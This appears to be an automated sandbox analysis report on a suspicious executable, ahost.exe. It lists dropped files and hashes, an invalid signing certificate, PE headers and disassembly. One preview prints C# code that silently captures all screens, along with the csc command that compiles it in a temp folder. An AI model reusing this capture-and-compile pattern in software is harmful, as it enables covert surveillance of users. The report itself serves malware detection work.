                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                                                            Entropy (8bit):3.0894605198873295
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry2Sak7YnqqjzPN5Dlq5J:+RI+ycuZhNRakSvPNnqX
                                                                                                                                                                                                                            MD5:16322AF854F5862907026DEED0D160CC
                                                                                                                                                                                                                            SHA1:BB743BBA2BE4D56B9EB42072DAF1ECB33BB948A0
                                                                                                                                                                                                                            SHA-256:7C99C32B237FCA901D5C8AF8DDB1A4A81407D005BCE61BA1120FE4F88E73F915
                                                                                                                                                                                                                            SHA-512:97CDA39197AFCE971DD862B8E70FC3514F5D8FD20B921FE17B527B8A1C66A86B876AB05BB55ED5E82ACADFF97253DB0192CBAE1D317357D0B492DC02E2BB4BB8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.h.b.t.5.s.l.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.h.b.t.5.s.l.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1004
                                                                                                                                                                                                                            Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                            MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                            SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                            SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                            SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (602), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):605
                                                                                                                                                                                                                            Entropy (8bit):5.306783752733921
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikywZ6WZEmwZf:V3ka6KOkqeFkywZbEmwZf
                                                                                                                                                                                                                            MD5:B5FF184BE9F86E06F837A9C356981AB5
                                                                                                                                                                                                                            SHA1:574F99EEA62D49D31052DB363D49FD2E07E9A2E6
                                                                                                                                                                                                                            SHA-256:4F96867754C7D4581ACF9024E19580A8B6052934043D70C409ACD616F9E3FCFF
                                                                                                                                                                                                                            SHA-512:67BBDBF0D1AF3321D37F9BCAAE177370077DD5F3BBEA89F168E8566B5798866ECE3AF179EFD26F0AE9951B74DEE7290A56FF5781834F028524D86EF40988DDFC
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.0.cs"
                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4096
                                                                                                                                                                                                                            Entropy (8bit):3.1540757159926742
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:6+7oEAtf0KhzBU/Zf6mtJKN0upW1ulRa3tq:+Nz0omiOEzK
                                                                                                                                                                                                                            MD5:C9C2776956BBB180A4EEEE5755C95FD1
                                                                                                                                                                                                                            SHA1:6E42F794DF407B482D21AA3B5724C2B0EB4CE9F4
                                                                                                                                                                                                                            SHA-256:8F09F7C905457744575BF5163EE329FB7E62E24E8451BA743E96B056C94AA68E
                                                                                                                                                                                                                            SHA-512:645F1EE94EEC8C93762544C90BA2D512E38CE1A3F6F31B8EFAA0D14E1F2BC11EAC729923A295FE33E4FBDCF285E15E309BDA59BC282ACCD807595FE2B6570126
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4.[g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (705), with CRLF, CR line terminators
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):1146
                                                                                                                                                                                                                            Entropy (8bit):5.470998445458484
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:KTwZDEkId3ka6KOkqeFkywZbEmwZGKax5DqBVKVrdFAMBJTH:mwZLkka6NkqeFkywZbEmwZGK2DcVKdBt
                                                                                                                                                                                                                            MD5:330B7996387628A4E4D4D24AD994116E
                                                                                                                                                                                                                            SHA1:D5ABAC3ACDE32EBFB8176C47A035C6B26CC23D34
                                                                                                                                                                                                                            SHA-256:8DBBE015804B28D245367EBF44BFD6DF4EEEED54707B21A9E0977EF24878ED55
                                                                                                                                                                                                                            SHA-512:2E9B7ACA9CBB85D97C804A886C49F15EEA3C4FD79B5DB5EFB24EB7BC10BDF95EA0A43F26421770A688098908819A205EA0FD2507340B9635636D1EC1BCBEC6AE
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer t
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe
                                                                                                                                                                                                                            File Type:RAR archive data, v5
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):692414
                                                                                                                                                                                                                            Entropy (8bit):7.999708142842713
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:12288:ANUd7XaDmz9N3M44xx46at610AWJxkv9Q0p2nyZD10qpl2:qUMDocxBywYJ+204nypJp4
                                                                                                                                                                                                                            MD5:7A7E2688BBE7BB0E723FFBF94271599C
                                                                                                                                                                                                                            SHA1:ED9906413AC2C21C28135FC6065DF4720E5A016C
                                                                                                                                                                                                                            SHA-256:F818D4856F87DBD5F93CF0C6575C05B9FE1D50AE3CD75CA3B4EA4AE53E420238
                                                                                                                                                                                                                            SHA-512:3B4ACFC3BDA1ABDED7B37296D20338B8AB2F6B757215A2E12CE2FBD7ADD03254869FA83A12A5E369AE9FB701264EE4F38D3D4ECC7CE9EA55AFBEB5C3196F3976
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:Rar!.....?.!........G..U...}.^....)...;{..E.0v...ev.<.X..~.M....qIS...}....b....?.r).N.wnCeA..r_g<W..DWkdN...3.!......3..#E.oh...N....AXq..r1...i.Od.T&0>/.2.0./.a..+...7..BO.W..n.s......P.W..J..m......Uy...u6_.U..........<.%%.p..MC...5....W.G....?.g.;..Y0eJ.B.<..:..`w.......Y.]>..=.{...[...'>x...A...N%.+..ux.}a.W1m..O.`:I^.}...q.k7.. .&9..u.M.L.$...^L.}!.1(..q.O{......l.[....x.g.nZ...o%.....EL....... .`u...r.m.PQ..z.s..z.Ig...l...+@....DCo...*iG.>....*..$,.eV.n.o.5.<.."..........wT=C.Z.H>a.3*h..tQK...M.D.-).^p....y.....h....QXbJ......1.h.j7.;..s..K.?. .[..-.....mHHY...o...<.v..y..>.m^.....7.y-Gd..%..k.....M.........4..........n%..e...<..... ......m..8.7......`!c..j..&\..].-...V.&.U.M.S...e..n.<.}R..u...f.....e.B....}0.G.4"`D62....Z..SB@U;......F..<}b.e..m.i...T8.[...-3&.n.%p.[.QN.,j....A`...h.G.|S1N..!....*...I-k....#j..`...K..J.AY.j.=PF!Q....ee...b....)t$.q.....l.;.?.K..n...n....uX..l[C..3..i..,t6{x.?N....*\.'.~....h..a0.._...,;..%.
                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):55
                                                                                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):97
                                                                                                                                                                                                                            Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                            MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                            SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                            SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                            SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                                                                                                                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Entropy (8bit):7.993241290598408
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                            File name:ahost.exe
                                                                                                                                                                                                                            File size:7'967'812 bytes
                                                                                                                                                                                                                            MD5:b5fc1d627d4db7ee46dc0fe38ac28d01
                                                                                                                                                                                                                            SHA1:35e2fa322989afa985734caa7c663510de21a2cc
                                                                                                                                                                                                                            SHA256:0f145a4d00566964b14e9b825779fd1aae1ea308a36e9d3536534779e19d64a1
                                                                                                                                                                                                                            SHA512:9f81b20c9d6e6652a4dde5d17722aa24e54c971e18bd80f3dd19b55427a3b8a9bc39444549ea98c39a571cd81049d37c54113a325f5c04daa1409ff0e8297610
                                                                                                                                                                                                                            SSDEEP:196608:BHHYHRwfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jN:SOIHziK1piXLGVE4Ue0VJJ
                                                                                                                                                                                                                            TLSH:E9863301B68009F6F6BBDA3DC8928419C473376217A0DAEB071CD27A1E731F99876767
                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..
                                                                                                                                                                                                                            Icon Hash:212303032313271a
                                                                                                                                                                                                                            Entrypoint:0x14000ce20
                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                            Time Stamp:0x6754A135 [Sat Dec 7 19:25:41 2024 UTC]
                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                            Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                                            Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                                            • 28/09/2021 20:00:00 28/09/2024 19:59:59
                                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                                            • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                                            Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                                                                            Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                                                                            Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                                                                            Serial:00BFB15001BBF592D4962A7797EA736FA3
                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            call 00007FEB8148D17Ch
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            jmp 00007FEB8148CD9Fh
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            call 00007FEB8148D548h
                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                            je 00007FEB8148CF43h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                            jmp 00007FEB8148CF27h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            cmp ecx, eax
                                                                                                                                                                                                                            je 00007FEB8148CF36h
                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            cmpxchg dword ptr [0003570Ch], ecx
                                                                                                                                                                                                                            jne 00007FEB8148CF10h
                                                                                                                                                                                                                            xor al, al
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                            mov al, 01h
                                                                                                                                                                                                                            jmp 00007FEB8148CF19h
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                            test ecx, ecx
                                                                                                                                                                                                                            jne 00007FEB8148CF29h
                                                                                                                                                                                                                            mov byte ptr [000356F5h], 00000001h
                                                                                                                                                                                                                            call 00007FEB8148C675h
                                                                                                                                                                                                                            call 00007FEB8148D960h
                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                            jne 00007FEB8148CF26h
                                                                                                                                                                                                                            xor al, al
                                                                                                                                                                                                                            jmp 00007FEB8148CF36h
                                                                                                                                                                                                                            call 00007FEB8149A47Fh
                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                            jne 00007FEB8148CF2Bh
                                                                                                                                                                                                                            xor ecx, ecx
                                                                                                                                                                                                                            call 00007FEB8148D970h
                                                                                                                                                                                                                            jmp 00007FEB8148CF0Ch
                                                                                                                                                                                                                            mov al, 01h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            inc eax
                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            sub esp, 20h
                                                                                                                                                                                                                            cmp byte ptr [000356BCh], 00000000h
                                                                                                                                                                                                                            mov ebx, ecx
                                                                                                                                                                                                                            jne 00007FEB8148CF89h
                                                                                                                                                                                                                            cmp ecx, 01h
                                                                                                                                                                                                                            jnbe 00007FEB8148CF8Ch
                                                                                                                                                                                                                            call 00007FEB8148D4BEh
                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                            je 00007FEB8148CF4Ah
                                                                                                                                                                                                                            test ebx, ebx
                                                                                                                                                                                                                            jne 00007FEB8148CF46h
                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                            lea ecx, dword ptr [000356A6h]
                                                                                                                                                                                                                            call 00007FEB8149A272h
                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca340x78.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x32f8.rsrc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2238.pdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x796ffc0x2448
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x4b0000x764.reloc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                            .text0x10000x29f700x2a000b8c3814c5fb0b18492ad4ec2ffe0830aFalse0.5518740699404762data6.489205819736506IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rdata0x2b0000x12a280x12c00362d3e01c8d134bb938536e8cc960395False0.5243229166666666data5.750783315647887IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .pdata0x440000x22380x24009cd1eac931545f28ab09329f8bfce843False0.4697265625data5.2645170849678795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rsrc0x470000x32f80x340056905e2af40063af19ad5b868c056ab5False0.8309044471153846data7.455750873320191IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .reloc0x4b0000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                            RT_ICON0x472500x1c1PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.024498886414254
                                                                                                                                                                                                                            RT_ICON0x474140x20cPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0209923664122138
                                                                                                                                                                                                                            RT_ICON0x476200x273PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0175438596491229
                                                                                                                                                                                                                            RT_ICON0x478940x434PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0102230483271375
                                                                                                                                                                                                                            RT_ICON0x47cc80x53ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced1.0081967213114753
                                                                                                                                                                                                                            RT_ICON0x482080x9b9PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced1.004419445560466
                                                                                                                                                                                                                            RT_ICON0x48bc40xdc3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.930456996877661
                                                                                                                                                                                                                            RT_GROUP_ICON0x499880x68data0.7403846153846154
                                                                                                                                                                                                                            RT_VERSION0x499f00x3f8data0.4438976377952756
                                                                                                                                                                                                                            RT_MANIFEST0x49de80x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                            USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                            COMCTL32.dll
